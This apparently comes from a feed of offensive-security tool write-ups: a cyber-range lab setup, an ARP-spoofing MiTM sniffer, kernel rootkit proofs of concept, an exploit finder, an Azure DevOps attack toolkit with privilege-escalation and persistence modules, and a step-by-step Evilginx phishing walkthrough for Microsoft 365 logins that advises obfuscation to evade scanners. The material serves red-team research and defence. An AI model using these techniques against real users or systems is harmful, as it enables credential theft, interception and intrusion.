        • 8 Core CPU or above
        • 16GB RAM or above
        • 100GB Disk free or above

        Installation

        Clone the repository

        git clone https://github.com/csalab-id/csaf.git

        Navigate to the project directory

        cd csaf

        Pull the Docker images

        docker-compose --profile=all pull

        Generate wazuh ssl certificate

        docker-compose -f generate-indexer-certs.yml run --rm generator

        For security reason you should set env like this first

        export ATTACK_PASS=ChangeMePlease
        export DEFENSE_PASS=ChangeMePlease
        export MONITOR_PASS=ChangeMePlease
        export SPLUNK_PASS=ChangeMePlease
        export GOPHISH_PASS=ChangeMePlease
        export MAIL_PASS=ChangeMePlease
        export PURPLEOPS_PASS=ChangeMePlease

        Start all the containers

        docker-compose --profile=all up -d

        You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab

        For example

        docker-compose --profile=attackdefenselab up -d

        Proof



        Exposed Ports

        An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

        • Port 6080 (Access to attack network)
        • Port 7080 (Access to defense network)
        • Port 8080 (Access to monitor network)

        Example usage

        Access internal network with proxy socks5

        • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
        • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
        • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

        Remote ssh with ssh client

        • ssh kali@ipaddress -p 6080 (default password: attackpassword)
        • ssh kali@ipaddress -p 7080 (default password: defensepassword)
        • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

        Access kali linux desktop with curl / browser

        • curl http://ipaddress:6080/vnc.html
        • curl http://ipaddress:7080/vnc.html
        • curl http://ipaddress:8080/vnc.html

        Domain Access

        • http://attack.lab/vnc.html (default password: attackpassword)
        • http://defense.lab/vnc.html (default password: defensepassword)
        • http://monitor.lab/vnc.html (default password: monitorpassword)
        • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
        • https://server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
        • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
        • https://mail.server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
        • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
        • http://phising.lab/
        • http://10.0.0.200:8081/
        • http://gitea.lab/ (default username: csalab, default password: giteapassword)
        • http://dvwa.lab/ (default username: admin, default passowrd: password)
        • http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)
        • http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)
        • http://wackopicko.lab/
        • http://juiceshop.lab/
        • https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)
        • https://wazuh-manager.lab/
        • https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)
        • http://splunk.lab/ (default username: admin, default password: splunkpassword)
        • https://infectionmonkey.lab:5000/
        • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
        • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

        Network / IP Address

        Attack

        • 10.0.0.100 attack.lab
        • 10.0.0.200 phising.lab
        • 10.0.0.201 server.lab
        • 10.0.0.201 mail.server.lab
        • 10.0.0.202 gophish.lab
        • 10.0.0.110 infectionmonkey.lab
        • 10.0.0.111 mongodb.lab
        • 10.0.0.112 purpleops.lab
        • 10.0.0.113 caldera.lab

        Defense

        • 10.0.1.101 defense.lab
        • 10.0.1.10 dvwa.lab
        • 10.0.1.13 wackopicko.lab
        • 10.0.1.14 juiceshop.lab
        • 10.0.1.20 gitea.lab
        • 10.0.1.110 infectionmonkey.lab
        • 10.0.1.112 purpleops.lab
        • 10.0.1.113 caldera.lab

        Monitor

        • 10.0.3.201 server.lab
        • 10.0.3.201 mail.server.lab
        • 10.0.3.9 mariadb.lab
        • 10.0.3.10 dvwa.lab
        • 10.0.3.11 dvwa-monitor.lab
        • 10.0.3.12 dvwa-modsecurity.lab
        • 10.0.3.102 monitor.lab
        • 10.0.3.30 wazuh-manager.lab
        • 10.0.3.31 wazuh-indexer.lab
        • 10.0.3.32 wazuh-dashboard.lab
        • 10.0.3.40 splunk.lab

        Public

        • 10.0.2.101 defense.lab
        • 10.0.2.13 wackopicko.lab

        Internet

        • 10.0.4.102 monitor.lab
        • 10.0.4.30 wazuh-manager.lab
        • 10.0.4.32 wazuh-dashboard.lab
        • 10.0.4.40 splunk.lab

        Internal

        • 10.0.5.100 attack.lab
        • 10.0.5.12 dvwa-modsecurity.lab
        • 10.0.5.13 wackopicko.lab

        License

        This Docker Compose application is released under the MIT License. See the LICENSE file for details.



        Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

        By: Zion3R

        Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so, all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionag e was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper, scapylib only assists with HTTP requests and ARP.


        Installation

        1: git clone https://www.github.com/josh0xA/Espionage.git
        2: cd Espionage
        3: sudo python3 -m pip install -r requirments.txt
        4: sudo python3 espionage.py --help

        Usage

        1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
          Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
        2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
          Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
        3. sudo python3 espionage.py --normal --iface wlan0
          Command 3 will still execute a clean packet sniff however, it will not save the data to a pcap file. Saving the sniff is recommended.
        4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
          Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
        5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
          Command 5 will ARP spoof the target ip address and all data being sent will be routed back to the attackers machine (you/localhost).
        6. sudo python3 espionage.py --iface wlan0 --onlyhttp
          Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
        7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
          Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
        8. sudo python3 espionage.py --iface wlan0 --urlonly
          Command 8 will only sniff and return sniffed urls visited by the victum. (works best with sslstrip).

        9. Press Ctrl+C in-order to stop the packet interception and write the output to file.

        Menu

        usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
        [-t TARGET]

        optional arguments:
        -h, --help show this help message and exit
        --version returns the packet sniffers version.
        -n, --normal executes a cleaner interception, less sophisticated.
        -v, --verbose (recommended) executes a more in-depth packet interception/sniff.
        -url, --urlonly only sniffs visited urls using http/https.
        -o, --onlyhttp sniffs only tcp/http data, returns urls visited.
        -ohs, --onlyhttpsecure
        sniffs only https data, (port 443).
        -hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

        (Recommended) arguments for data output (.pcap):
        -f FILENAME, --filename FILENAME
        name of file to store the output (make extension '.pcap').

        (Required) arguments required for execution:
        -i IFACE, --iface IFACE
        specify network interface (ie. wlan0, eth0, wlan1, etc.)

        (ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
        -t TARGET, --target TARGET

        A Linux Packet Sniffing Suite for Automated MiTM Attacks (6)

        Writeup

        A simple medium writeup can be found here:
        Click Here For The Official Medium Article

        Ethical Notice

        The developer of this program, Josh Schiavone, written the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicous intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

        License

        MIT License
        Copyright (c) 2024 Josh Schiavone




        C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

        By: Zion3R


        Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

        The feed should update daily. Actively working on making the backend more reliable


        Honorable Mentions

        Many of the Shodan queries have been sourced from other CTI researchers:

        Huge shoutout to them!

        Thanks to BertJanCyber for creating the KQL query for ingesting this feed

        And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

        What do I track?

        Running Locally

        If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

        echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
        bash
        python3 -m pip install -r requirements.txt
        python3 tracker.py

        Contributing

        I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

        References



        VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

        By: Zion3R


        PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.

        NOTE

        Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.

        Β 

        Environment

        All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:

        1. Enable Loading of Test Signed Drivers

        2. debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging

        Each options require to disable secure boot.

        Modules

        Detailed information is given in README.md in each project's directories. All modules are tested in Windows 11.

        Module Name Description
        BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
        BlockNewProc PoCs to block new process with Process Notify Callback method.
        CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
        DropProcAccess PoCs to drop process handle access with Object Notify Callback.
        GetFullPrivs PoCs to get full privileges with DKOM method.
        GetProcHandle PoCs to get full access process handle from kernelmode.
        InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
        ModHide PoCs to hide loaded kernel drivers with DKOM method.
        ProcHide PoCs to hide process with DKOM method.
        ProcProtect PoCs to manipulate Protected Process.
        QueryModule PoCs to perform retrieving kernel driver loaded address information.
        StealToken PoCs to perform token stealing from kernelmode.

        TODO

        More PoCs especially about following things will be added later:

        • Notify callback
        • Filesystem mini-filter
        • Network mini-filter

        Recommended References



        Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

        By: Zion3R


        A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

        This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


        Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video

        β˜•οΈŽ Buy Me A Coffee

        Video Tutorial: πŸ‘‡

        Disclaimer

        This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

        Backstory - The Why

        Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

        That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

        The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

        In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

        The What

        A Browser In The Browser (BITB) without any iframes! As simple as that.

        Meaning that we can now use BITB with Evilginx on websites like Microsoft.

        Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

        The How

        Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

        Instructions

        Video Tutorial


        Local VM:

        Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

        Update and Upgrade system packages:

        sudo apt update && sudo apt upgrade -y

        Evilginx Setup:

        Optional:

        Create a new evilginx user, and add user to sudo group:

        sudo su

        adduser evilginx

        usermod -aG sudo evilginx

        Test that evilginx user is in sudo group:

        su - evilginx

        sudo ls -la /root

        Navigate to users home dir:

        cd /home/evilginx

        (You can do everything as sudo user as well since we're running everything locally)

        Setting Up Evilginx

        Download and build Evilginx: Official Docs

        Copy Evilginx files to /home/evilginx

        Install Go: Official Docs

        wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
        sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
        nano ~/.profile

        ADD: export PATH=$PATH:/usr/local/go/bin

        source ~/.profile

        Check:

        go version

        Install make:

        sudo apt install make

        Build Evilginx:

        cd /home/evilginx/evilginx2
        make

        Create a new directory for our evilginx build along with phishlets and redirectors:

        mkdir /home/evilginx/evilginx

        Copy build, phishlets, and redirectors:

        cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

        cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

        cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

        Ubuntu firewall quick fix (thanks to @kgretzky)

        sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

        On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

        sudo nano /etc/systemd/resolved.conf

        edit/add the DNSStubListener to no > DNSStubListener=no

        then

        sudo systemctl restart systemd-resolved

        Modify Evilginx Configurations:

        Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

        nano ~/.evilginx/config.json

        CHANGE https_port from 443 to 8443

        Install Apache2 and Enable Mods:

        Install Apache2:

        sudo apt install apache2 -y

        Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

        sudo a2enmod proxy
        sudo a2enmod proxy_http
        sudo a2enmod proxy_balancer
        sudo a2enmod lbmethod_byrequests
        sudo a2enmod env
        sudo a2enmod include
        sudo a2enmod setenvif
        sudo a2enmod ssl
        sudo a2ensite default-ssl
        sudo a2enmod cache
        sudo a2enmod substitute
        sudo a2enmod headers
        sudo a2enmod rewrite
        sudo a2dismod access_compat

        Start and enable Apache:

        sudo systemctl start apache2
        sudo systemctl enable apache2

        Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

        Clone this Repo:

        Install git if not already available:

        sudo apt -y install git

        Clone this repo:

        git clone https://github.com/waelmas/frameless-bitb
        cd frameless-bitb

        Apache Custom Pages:

        Make directories for the pages we will be serving:

        • home: (Optional) Homepage (at base domain)
        • primary: Landing page (background)
        • secondary: BITB Window (foreground)
        sudo mkdir /var/www/home
        sudo mkdir /var/www/primary
        sudo mkdir /var/www/secondary

        Copy the directories for each page:


        sudo cp -r ./pages/home/ /var/www/

        sudo cp -r ./pages/primary/ /var/www/

        sudo cp -r ./pages/secondary/ /var/www/

        Optional: Remove the default Apache page (not used):

        sudo rm -r /var/www/html/

        Copy the O365 phishlet to phishlets directory:

        sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

        Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

        Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

        Self-signed SSL certificates:

        Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

        We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

        Create dir and parents if they do not exist:

        sudo mkdir -p /etc/ssl/localcerts/fake.com/

        Generate the SSL certs using the OpenSSL config file:

        sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
        -keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
        -config openssl-local.cnf

        Modify private key permissions:

        sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

        Apache Custom Configs:

        Copy custom substitution files (the core of our approach):

        sudo cp -r ./custom-subs /etc/apache2/custom-subs

        Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

        Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

        # Uncomment the one you want and remember to restart Apache after any changes:
        #Include /etc/apache2/custom-subs/win-chrome.conf
        Include /etc/apache2/custom-subs/mac-chrome.conf

        Simply to make it easier, I included both versions as separate files for this next step.

        Windows/Chrome BITB:

        sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

        Mac/Chrome BITB:

        sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

        Test Apache configs to ensure there are no errors:

        sudo apache2ctl configtest

        Restart Apache to apply changes:

        sudo systemctl restart apache2

        Modifying Hosts:

        Get the IP of the VM using ifconfig and note it somewhere for the next step.

        We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

        On Windows:

        Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

        Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

        C:\Windows\System32\drivers\etc\

        Change the file types (bottom-right) to "All files".

        Double-click the file named hosts

        On Mac:

        Open a terminal and run the following:

        sudo nano /private/etc/hosts

        Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

        # Local Apache and Evilginx Setup
        [IP] login.fake.com
        [IP] account.fake.com
        [IP] sso.fake.com
        [IP] www.fake.com
        [IP] portal.fake.com
        [IP] fake.com
        # End of section

        Save and exit.

        Now restart your browser before moving to the next step.

        Note: On Mac, use the following command to flush the DNS cache:

        sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

        Important Note:

        This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

        Trusting the Self-Signed SSL Certs:

        Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

        For this step, it's easier to follow the video instructions, but here is the gist anyway.

        Open https://fake.com/ in your Chrome browser.

        Ignore the Unsafe Site warning and proceed to the page.

        Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

        Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

        On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

        Now RESTART your Browser

        You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

        Running Evilginx:

        At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

        Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

        sudo apt install tmux -y

        Start Evilginx in developer mode (using tmux to avoid losing the session):

        tmux new-session -s evilginx
        cd ~/evilginx/
        ./evilginx -developer

        (To re-attach to the tmux session use tmux attach-session -t evilginx)

        Evilginx Config:

        config domain fake.com
        config ipv4 127.0.0.1

        IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

        blacklist noadd

        Setup Phishlet and Lure:

        phishlets hostname O365 fake.com
        phishlets enable O365
        lures create O365
        lures get-url 0

        Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

        Useful Resources

        Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

        Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

        My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

        How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

        Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

        TODO

        • Create script(s) to automate most of the steps


        Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

        By: Zion3R


        This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

        It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


        Advantages

        To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

        1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

        2. The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.

        3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

        4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

        Installation

        1. You can simply download the stable versions from the release section, where you can also find the installer.

        2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
          You will find the binary in the folder bin\updater\updater.exe.

        Tool set

        This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
        Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
        You can check the complete list of tools here.

        About contributions

        Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



        APKDeepLens - Android Security Insights In Full Spectrum

        By: Zion3R


        APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


        Features

        APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

        • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
        • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
        • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
        • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
        • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
        • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
        • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations
        • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
        • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
        • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

        Installation

        To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

        For Linux

        git clone https://github.com/d78ui98/APKDeepLens/tree/main
        cd /APKDeepLens
        python3 -m venv venv
        source venv/bin/activate
        pip install -r requirements.txt
        python APKDeepLens.py --help

        For Windows

        git clone https://github.com/d78ui98/APKDeepLens/tree/main
        cd \APKDeepLens
        python3 -m venv venv
        .\venv\Scripts\activate
        pip install -r .\requirements.txt
        python APKDeepLens.py --help

        Usage

        To simply scan an APK, use the below command. Mention the apk file with -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

        python3 APKDeepLens.py -apk file.apk

        If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source parameter.

        python3 APKDeepLens.py -apk file.apk -source <source-code-path>

        To generate detailed PDF and HTML reports after the scan you can pass -report argument as mentioned below.

        python3 APKDeepLens.py -apk file.apk -report

        Contributing

        We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

        For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

        Featured at



        Sicat - The Useful Exploit Finder

        By: Zion3R

        Introduction

        SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

        SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


        SiCat Resources

        Installation

        git clone https://github.com/justakazh/sicat.git && cd sicat

        pip install -r requirements.txt

        Usage


        ~$ python sicat.py --help

        Command Line Options:

        Command Description
        -h Show help message and exit
        -k KEYWORD
        -kv KEYWORK_VERSION
        -nm Identify via nmap output
        --nvd Use NVD as info source
        --packetstorm Use PacketStorm as info source
        --exploitdb Use ExploitDB as info source
        --exploitalert Use ExploitAlert as info source
        --msfmoduke Use metasploit as info source
        -o OUTPUT Path to save output to
        -ot OUTPUT_TYPE Output file type: json or html

        Examples

        From keyword


        python sicat.py -k telerik --exploitdb --msfmodule

        From nmap output


        nmap --open -sV localhost -oX nmap_out.xml
        python sicat.py -nm nmap_out.xml --packetstorm

        To-do

        • [ ] Input from nmap result from pipeline
        • [ ] Nmap multiple host support
        • [ ] Search NSE Script
        • [ ] Search by PORT

        Contribution

        I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



        ADOKit - Azure DevOps Services Attack Toolkit

        By: Zion3R


        Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

        Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


        Installation/Building

        Libraries Used

        The below 3rd party libraries are used in this project.

        Library URL License
        Fody https://github.com/Fody/Fody MIT License
        Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License

        Pre-Compiled

        • Use the pre-compiled binary in Releases

        Building Yourself

        Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

        • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
        • Go to "NuGet Package Manager" --> "Package Sources"
        • Add a package source with the URL https://api.nuget.org/v3/index.json
        • Install the Costura.Fody NuGet package.
        • Install-Package Costura.Fody -Version 3.3.3
        • Install the Newtonsoft.Json package
        • Install-Package Newtonsoft.Json
        • You can now build the project yourself!

        Command Modules

        • Recon
        • check - Check whether organization uses Azure DevOps and if credentials are valid
        • whoami - List the current user and its group memberships
        • listrepo - List all repositories
        • searchrepo - Search for given repository
        • listproject - List all projects
        • searchproject - Search for given project
        • searchcode - Search for code containing a search term
        • searchfile - Search for file based on a search term
        • listuser - List users
        • searchuser - Search for a given user
        • listgroup - List groups
        • searchgroup - Search for a given group
        • getgroupmembers - List all group members for a given group
        • getpermissions - Get the permissions for who has access to a given project
        • Persistence
        • createpat - Create personal access token for user
        • listpat - List personal access tokens for user
        • removepat - Remove personal access token for user
        • createsshkey - Create public SSH key for user
        • listsshkey - List public SSH keys for user
        • removesshkey - Remove public SSH key for user
        • Privilege Escalation
        • addprojectadmin - Add a user to the "Project Administrators" for a given project
        • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
        • addbuildadmin - Add a user to the "Build Administrators" group for a given project
        • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
        • addcollectionadmin - Add a user to the "Project Collection Administrators" group
        • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
        • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
        • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
        • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
        • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
        • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
        • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
        • getpipelinevars - Retrieve any pipeline variables used for a given project.
        • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
        • getserviceconnections - Retrieve the service connections used for a given project.

        Arguments/Options

        • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
        • /url: - Azure DevOps URL. Applicable to all modules.
        • /search: - Keyword to search for. Not applicable to all modules.
